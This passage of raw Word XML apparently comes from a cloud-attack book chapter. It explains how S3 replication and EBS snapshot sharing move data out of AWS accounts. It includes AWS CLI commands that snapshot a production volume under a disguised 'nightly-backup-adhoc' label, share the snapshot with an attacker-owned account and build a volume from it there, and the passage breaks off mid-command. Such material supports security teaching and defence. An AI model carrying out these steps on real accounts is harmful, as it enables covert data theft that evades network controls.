        <w:t>"Account"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"444455556666"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC6600" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2241AD9F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE7944" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=== get-public-access-block ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6EF623" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5895D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"PublicAccessBlockConfiguration"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD376CC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"BlockPublicAcls"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A814AEC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"IgnorePublicAcls"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D241F44" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"BlockPublicPolicy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0643E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"RestrictPublicAccess"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA29821" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB322B2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946F87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Replication is the quiet exfiltration primitive. If you hold </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutReplicationConfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a bucket, and you hold </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a role with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:ReplicateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges, you can replicate the entire bucket's contents to a destination bucket in another account. The destination can be owned by the attacker. From that moment on, every object written to the source bucket is automatically replicated, in near real time, to the attacker's bucket. This is a persistent exfiltration channel, not a point-in-time snapshot, and it survives credential rotation as long as the replication role is intact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B75D3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It also blends extraordinarily well: replication is a normal feature used by most mature organizations for cross-region durability or cross-account backup. A CloudTrail event for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutBucketReplication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not intrinsically suspicious. The defender must know which buckets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> have replication configured and to which destinations — a control that few teams have implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F804C0B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>11.2  EBS snapshot exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F210E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single most durable attack in this chapter is: take an EBS snapshot, share it cross-account with an attacker-controlled account, mount it there, read. The reason this is a preferred operator technique is that it bypasses every network-level data-loss-prevention control, every S3 access log, every VPC egress filter. The data moves on AWS's own plane, as an AWS-managed operation, with no inbound or outbound traffic from the source account's perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F054C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="475227371"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Figure 11.1 — EBS snapshot exfiltration. No data crosses the defender's VPC. The share is an AWS-internal operation; volume hydration happens in the attacker's account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB01DC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="567689629"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Victim account 11112222333</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EC2 instance with attached EB</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prod database volum</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CreateSnapsho</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Snapshot snap-abc12</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point-in-time cop</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ModifySnapshotAttribut</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CreateVolumePermission → 99998888777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7</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Attacker account 99998888777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7</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Create volume from snapsho</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CreateVolume, SnapshotId=snap-abc12</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Attach to attacker EC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2</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mount /dev/xvdf /mn</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Read files, dump database, grep secret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AWS-internal shar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p>
    <w:p w14:paraId="1B83392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required IAM is modest: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:CreateSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:CreateSnapshots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for volume groups), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:ModifySnapshotAttribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to adjust the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>createVolumePermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">list, and — if the volume is encrypted — either the ability to use the source account's KMS key, or the ability to create a new snapshot encrypted under a key the attacker's account can use, typically via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:CopySnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a re-encryption to an AWS-managed key or to a KMS key that has a policy shared cross-account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14354E8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KMS subtlety matters. AWS-managed keys (aliased </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws/ebs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) cannot be shared cross-account. Customer-managed keys can, but only if the key policy permits the attacker's account principal to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:CreateGrant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the attacker holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:PutKeyPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the key, they can edit the policy to add their own account; otherwise the attacker must re-encrypt via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CopySnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, which requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:GenerateDataKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on both keys. Organizations frequently miss these key-policy paths when they audit their KMS surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C12B9C8"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c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># enumerate candidate volumes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E0998"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ec2 describe-volumes \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972E12F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'Volumes[?State==`in-use`].[VolumeId,Size,Attachments[0].InstanceId,Tags]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735C787" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75345ED4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># snapshot the crown jewel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526F495"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ec2 create-snapshot \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281E4D9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --volume-id vol-0a1b2c3d \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35483F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --description </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"nightly-backup-adhoc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23219CFD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"SnapshotId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"snap-0abcdef01"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"State"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"pending"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B905260"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ec2 wait snapshot-completed --snapshot-ids snap-0abcdef01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB51D1E"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2 modify-snapshot-attribute \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212AE57C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --snapshot-id snap-0abcdef01 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B29ADF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --attribute createVolumePermission \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC01CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --operation-type add \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DF66F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --user-ids 999988887777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3B574"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c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># over in the attacker account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44CE4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>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--profile attacker ec2 create-volume \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB2B6D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --availability-zone us-east-1a --snapshot-id snap-0abcdef01</w:t>
      </w:r>
    </w:p>
